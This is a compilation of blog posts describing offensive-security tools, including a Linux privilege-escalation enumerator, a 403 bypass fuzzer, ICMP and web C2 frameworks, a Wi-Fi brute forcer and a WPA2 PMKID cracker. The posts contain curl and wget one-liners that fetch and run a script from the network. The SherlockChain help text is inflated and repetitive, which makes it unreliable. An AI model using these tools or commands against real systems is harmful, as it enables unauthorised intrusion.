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SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

By: Zion3R


SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


Key Features

  • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
  • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
  • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
  • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
  • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
  • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

Installation

To install SherlockChain, follow these steps:

git clone https://github.com/0xQuantumCoder/SherlockChain.git
cd SherlockChain
pip install .

AI-Powered Features

SherlockChain's AI integration brings several advanced capabilities to the table:

  1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
  2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
  3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
  4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

  5. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

  6. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
  7. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
  8. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
  9. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
  10. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

Example usage:

sherlockchain --help

This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
[--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
[--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
[--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
[--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
[--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
[--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
[--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
[--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
[--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
[--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
[--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
[--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
[--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
[--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
[--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
[--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
[--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
[--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
[--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
[--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
[--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
[--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
[--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
[--report-all-detectors] [--report-all-severity] [--report-all-impact]
[--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
[--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
[--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
[--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
[--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
[--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
[--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
[--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
[--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
[--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
[--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
[--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
[--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
[--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
[--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
[--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
[--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
[--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
[--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
[--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
[--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
[--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
[--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
[--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
[--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
[--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
[--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
[--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
[--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
[--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
[--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
[--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
[--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
[--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
[--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
[--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
[--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
[--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
[--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
[--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
[--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

  • Vulnerability detection options: --detect, --exclude-detectors
  • Reporting options: --report-format, --report-output, --report-*
  • Filtering options: --filter-*
  • AI integration options: --ai-*
  • Integration with development frameworks: --truffle, --truffle-build-directory
  • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

AI-Powered Detectors

Num Detector What it Detects Impact Confidence
1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium
## Detectors
Num Detector What it Detects Impact Confidence
1 abiencoderv2-array Storage abiencoderv2 array High High
2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
3 array-by-reference Modifying storage array by value High High
4 encode-packed-collision ABI encodePacked Collision High High
5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
6 multiple-constructors Multiple constructor schemes High High
7 name-reused Contract's name reused High High
8 protected-vars Detected unprotected variables High High
9 public-mappings-nested Public mappings with nested variables High High
10 rtlo Right-To-Left-Override control character is used High High
11 shadowing-state State variables shadowing High High
12 suicidal Functions allowing anyone to destruct the contract High High
13 uninitialized-state Uninitialized state variables High High
14 uninitialized-storage Uninitialized storage variables High High
15 unprotected-upgrade Unprotected upgradeable contract High High
16 codex Use Codex to find vulnerabilities. High Low
17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
19 controlled-array-length Tainted array length assignment High Medium
20 controlled-delegatecall Controlled delegatecall destination High Medium
21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
22 incorrect-exp Incorrect exponentiation High Medium
23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
24 msg-value-loop msg.value inside a loop High Medium
25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
26 return-leave If a return is used instead of a leave. High Medium
27 storage-array Signed storage integer array compiler bug High Medium
28 unchecked-transfer Unchecked tokens transfer High Medium
29 weak-prng Weak PRNG High Medium
30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
31 enum-conversion Detect dangerous enum conversion Medium High
32 erc20-interface Incorrect ERC20 interfaces Medium High
33 erc721-interface Incorrect ERC721 interfaces Medium High
34 incorrect-equality Dangerous strict equalities Medium High
35 locked-ether Contracts that lock ether Medium High
36 mapping-deletion Deletion on mapping containing a structure Medium High
37 shadowing-abstract State variables shadowing from abstract contracts Medium High
38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
39 tautology Tautology or contradiction Medium High
40 write-after-write Unused write Medium High
41 boolean-cst Misuse of Boolean constant Medium Medium
42 constant-function-asm Constant functions using assembly code Medium Medium
43 constant-function-state Constant functions changing the state Medium Medium
44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
47 reused-constructor Reused base constructor Medium Medium
48 tx-origin Dangerous usage of tx.origin Medium Medium
49 unchecked-lowlevel Unchecked low-level calls Medium Medium
50 unchecked-send Unchecked send Medium Medium
51 uninitialized-local Uninitialized local variables Medium Medium
52 unused-return Unused return values Medium Medium
53 incorrect-modifier Modifiers that can return the default value Low High
54 shadowing-builtin Built-in symbol shadowing Low High
55 shadowing-local Local variables shadowing Low High
56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
57 variable-scope Local variables used prior their declaration Low High
58 void-cst Constructor called not implemented Low High
59 calls-loop Multiple calls in a loop Low Medium
60 events-access Missing Events Access Control Low Medium
61 events-maths Missing Events Arithmetic Low Medium
62 incorrect-unary Dangerous unary expressions Low Medium
63 missing-zero-check Missing Zero Address Validation Low Medium
64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
67 timestamp Dangerous usage of block.timestamp Low Medium
68 assembly Assembly usage Informational High
69 assert-state-change Assert state change Informational High
70 boolean-equal Comparison to boolean constant Informational High
71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
72 deprecated-standards Deprecated Solidity Standards Informational High
73 erc20-indexed Un-indexed ERC20 event parameters Informational High
74 function-init-state Function initializing state variables Informational High
75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
76 low-level-calls Low level calls Informational High
77 missing-inheritance Missing inheritance Informational High
78 naming-convention Conformity to Solidity naming conventions Informational High
79 pragma If different pragma directives are used Informational High
80 redundant-statements Redundant statements Informational High
81 solc-version Incorrect Solidity version Informational High
82 unimplemented-functions Unimplemented functions Informational High
83 unused-import Detects unused imports Informational High
84 unused-state Unused state variables Informational High
85 costly-loop Costly operations in a loop Informational Medium
86 dead-code Functions that are not used Informational Medium
87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
88 similar-names Variable names are too similar Informational Medium
89 too-many-digits Conformance to numeric notation best practices Informational Medium
90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
91 constable-states State variables that could be declared constant Optimization High
92 external-function Public function that could be declared external Optimization High
93 immutable-states State variables that could be declared immutable Optimization High
94 var-read-using-this Contract reads its own variable using this Optimization High


Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

By: Zion3R


First, a couple of useful oneliners ;)

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

Note that since version 2.10 you can serve the script to other hosts with the -S flag!


linux-smart-enumeration

Linux enumeration tools for pentesting and CTFs

This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view.

What is it?

This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p parameter.

It has 3 levels of verbosity so you can control how much information you see.

In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

How to use it?

The idea is to get the information gradually.

First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with.

If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r.

You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

Use: ./lse.sh [options]

OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.

Is it pretty?

Usage demo

Also available in webm video


Level 0 (default) output sample


Level 1 verbosity output sample


Level 2 verbosity output sample


Examples

Direct execution oneliners

bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

By: Zion3R


The original 403fuzzer.py :)

Fuzz 401/403ing endpoints for bypasses

This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.

It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.

I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

You can now feed it raw HTTP requests that you save to a file from Burp.

Follow me on twitter! @intrudir


Usage

usage: bypassfuzzer.py -h

Specifying a request to test

Best method: Feed it a raw HTTP request from Burp!

Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests

python3 bypassfuzzer.py -r request.txt

Using other flags

Specify a URL

python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

Specify cookies to use in requests:
some examples:

--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"

Specify a method/verb and body data to send

bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>

Specify -H "header: value" for each additional header you'd like to add:

bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

Smart filter feature!

Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

Repeats are changeable in the code until I add an option to specify it in flag

NOTE: Can't be used simultaneously with -hc or -hl (yet)

# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart

Specify a proxy to use

Useful if you wanna proxy through Burp

bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

Skip sending header payloads or url payloads

# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers

# Skip sending path normailization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls

Hide response code/length

Provide comma delimited lists without spaces. Examples:

# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638

TODO

  • [x] Automatically check other methods/verbs for bypass
  • [x] absolute domain attack
  • [ ] Add HTTP/2 support
  • [ ] Looking for ideas. Ping me on twitter! @intrudir


PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

By: Zion3R


PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

Features:

  • Uses ICMP for Command and Control
  • Undetectable by most AV/EDR solutions
  • Written in Go

Installation:

Download the binaries

or build the binaries and you are ready to go:

$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go

Usage:

Server:

./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)

Client:

./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)



C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

By: Zion3R


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

🔒 Anywhere Access: Reach the C2 Cloud from any location.
🔄 Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
🖱️ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
📜 Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

🛠️ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
🔗 TCP Socket: Serving reverse TCP requests for enhanced functionality.
🌐 Nginx: Effortlessly routing traffic between web and backend systems.
📨 Redis PubSub: Serving as a robust message broker for seamless communication.
🚀 Websockets: Delivering real-time updates to browser clients for enhanced user experience.
💾 Postgres DB: Ensuring persistent storage for seamless continuity.

Architecture

Application setup

  • Management port: 9000
  • Reversse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.

Contact



HackerInfo - Infromations Web Application Security

By: Zion3R




Infromations Web Application Security


install :

sudo apt install python3 python3-pip

pip3 install termcolor

pip3 install google

pip3 install optioncomplete

pip3 install bs4


pip3 install prettytable

git clone https://github.com/Matrix07ksa/HackerInfo/

cd HackerInfo

chmod +x HackerInfo

./HackerInfo -h



python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################

Usage:

Hackerinfo infromations Web Application Security (11)

Library install hackinfo:

sudo python setup.py install
pip3 install hackinfo



Noia - Simple Mobile Applications Sandbox File Browser Tool

By: Zion3R


Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.

Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.


Installation & Usage

npm install -g noia
noia

Features

  • Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.

  • View custom binary files. Directly preview SQLite databases, images, and more.

  • Search application by name.

  • Search files and directories by name.

  • Navigate to a custom directory using the ctrl+g shortcut.

  • Download the application files and directories for further analysis.

  • Basic iOS support

and more


Setup

Desktop requirements:

  • node.js LTS and npm
  • Any decent modern desktop browser

Noia is available on npm, so just type the following command to install it and run it:

npm install -g noia
noia

Device setup:

Noia is powered by frida.re, thus requires Frida to run.

Rooted Device

See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

Non-rooted Device

  • https://koz.io/using-frida-on-android-without-root/
  • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
  • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

Security Warning

This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

LICENCE

MIT



WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies

By: Zion3R


WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.


Installation

The packages are minimal or nearly none 😅. The package install command is:

pip install rich pyfiglet

Thats it.


Features

So listing the features:

  • Overall Features:
  • We can use custom interfaces or non-default interfaces to run the attack.
  • Well-defined way of using netsh and listing and utilizing targets.
  • Upgradeability
  • Code-Wise Features:
  • Interactive menu-driven system with rich.
  • versatility in using interface, targets, and password files.

How it works

So this is how the bruteforcer works:

  • Provide Interface:

  • The user is required to provide the network interface for the tool to use.

  • By default, the interface is set to Wi-Fi.

  • Search and Set Target:

  • The user must search for and select the target network.

  • During this process, the tool performs the following sub-steps:

    • Disconnects all active network connections for the selected interface.
    • Searches for all available networks within range.
  • Input Password File:

  • The user inputs the path to the password file.

  • The default path for the password file is ./wordlist/default.txt.

  • Run the Attack:

  • With the target set and the password file ready, the tool is now prepared to initiate the attack.

  • Attack Procedure:

  • The attack involves iterating through each password in the provided file.
  • For each password, the following steps are taken:
    • A custom XML configuration for the connection attempt is generated and stored.
    • The tool attempts to connect to the target network using the generated XML and the current password.
    • To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
    • If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
    • This loop continues until a successful ping response is received, indicating a successful connection attempt.

How to run this

After installing all the packages just run python main.py rest is history 👍 make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:

 


Contributions

For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.



SpeedyTest - Command-Line Tool For Measuring Internet Speed

By: Zion3R


SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.


Features
  • Measure download speed, upload speed, and ping latency.
  • Generate detailed reports with graphical representation of speed test results.
  • Save and export test results in various formats (CSV, JSON, etc.).
  • Customize speed test parameters and server selection.
  • Compare speed test results over time to track performance changes.
  • Integrate SpeedyTest into your own applications using the provided API.
  • track your timeline with saved database

Installation
git clone https://github.com/HalilDeniz/SpeedyTest.git

Requirements

Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:

pip install -r requirements.txt

Usage

Run the following command to perform a speed test:

python3 speendytest.py

Visual Output



Output
Receiving data \
Speed test completed!
Speed test time: 20.22 second
Server : Farknet - Konya
IP Address: speedtest.farknet.com.tr:8080
Country : Turkey
City : Konya
Ping : 20.41 ms
Download : 90.12 Mbps
Loading : 20 Mbps







Contributing

Contributions are welcome! To contribute to SpeedyTest, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PrivacyNet, please feel free to contact me:


License

SpeedyTest is released under the MIT License. See LICENSE for details.



Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
